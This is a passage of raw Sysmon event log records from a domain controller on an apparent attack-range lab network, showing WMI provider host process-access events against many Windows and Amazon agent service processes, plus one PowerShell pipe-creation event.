Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002241988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:42.389{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460\PSHost.132591776822625792.12460.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002241987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CBAA-00000000AD01}10480C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CBAA-00000000AD01}10480C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 